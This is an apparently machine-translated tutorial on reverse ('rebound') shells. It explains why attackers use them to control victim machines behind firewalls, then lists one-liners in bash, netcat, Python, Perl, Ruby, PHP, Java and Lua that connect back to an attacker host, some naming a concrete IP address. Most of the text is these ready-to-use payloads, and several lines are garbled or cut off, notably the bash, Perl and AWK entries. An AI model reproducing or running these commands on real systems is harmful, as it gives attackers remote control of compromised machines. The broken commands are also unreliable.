1, What is a rebound shell?
The reverse shell is that the control end listens to a TCP/UDP port, the controlled end initiates a request to the port, and transfers the input and output of its command line to the control end.
The reverse shell corresponds to standard shells such as telnet and SSH. In essence, it is the role reversal of the client and server of the network concept.
2, Why bounce shell?
Why bounce shell?
It is usually used for the controlled end due to limited firewall, insufficient permissions, port occupation, etc.
For example, suppose we attack a machine and open a port of the machine. The attacker connects to the target machine (target ip: target machine port) on his own machine. This is a conventional form, which we call forward connection. Remote desktop, web service, ssh, telnet, etc. are all forward connections. Under what circumstances can forward connection not be used?
There are the following situations:
There are the following situations:
- A client has your network horse, but it is in the LAN, and you can't connect directly.
- The ip of the target machine changes dynamically and you can't control it continuously.
- Due to restrictions such as firewall, the other machine can only send requests and cannot receive requests.
- For viruses, Trojans, when the victim can be recruited, what the other party's network environment is, when to switch on and off, etc. are unknown. Therefore, it is the best policy to establish a server and let the malicious program actively connect.
- Then the rebound is well understood. The attacker specifies the server, and the victim host actively connects to the attacker's server program, which is called rebound connection.
3, bash
Perform port listening on the attack host: // Port is the port number of the attack host, and this port number is not occupied
nc -lvvp 1000
On the target host:
Bash - I > & / dev / TCP / attack host IP / port 0 > & 1 // Port is the port number of the attack host
4, nc(netcat) bounce
Perform port listening on the attack host:
nc -lvvp port // Port is the port number of the attack host, and this port number is not occupied
On the target host:
nc -e /bin/bash attack host ip port
5, Common script bounce
The above script is executed on the target host, where x.x.x.x is the ip of the attack host, and it is necessary to listen to the relevant ports on the attack host in advance. I won't repeat it next
1. python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
2. perl
Method 1:
perl -e 'use perl -e 'use Socket;$i="121.5.112.123";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))));'
Method 2:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
3. Ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("121.5.112.123","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
4. PHP
php -r '$sock=fsockopen("121.5.112.123",5555);exec("/bin/bash -i <&3 >&3 2>&3");'
5. Java
public class Revs { /** * @param args * @throws Exception */ public static void main(String[] args) throws Exception { // TODO Auto-generated method stub Runtime r = Runtime.getRuntime(); String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/5555;cat <&5 | while read line; do $line 2>&5 >&5; done"}; Process p = r.exec(cmd); p.waitFor(); } }
6. Lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('121.5.112.123','5555');os.execute('/bin/sh -i <&3 >&3 2>&3');"
7. AWK rebound
The attack machine listens. When receiving the shell, you can't enter, otherwise it will be disconnected
awk 'BEGIN'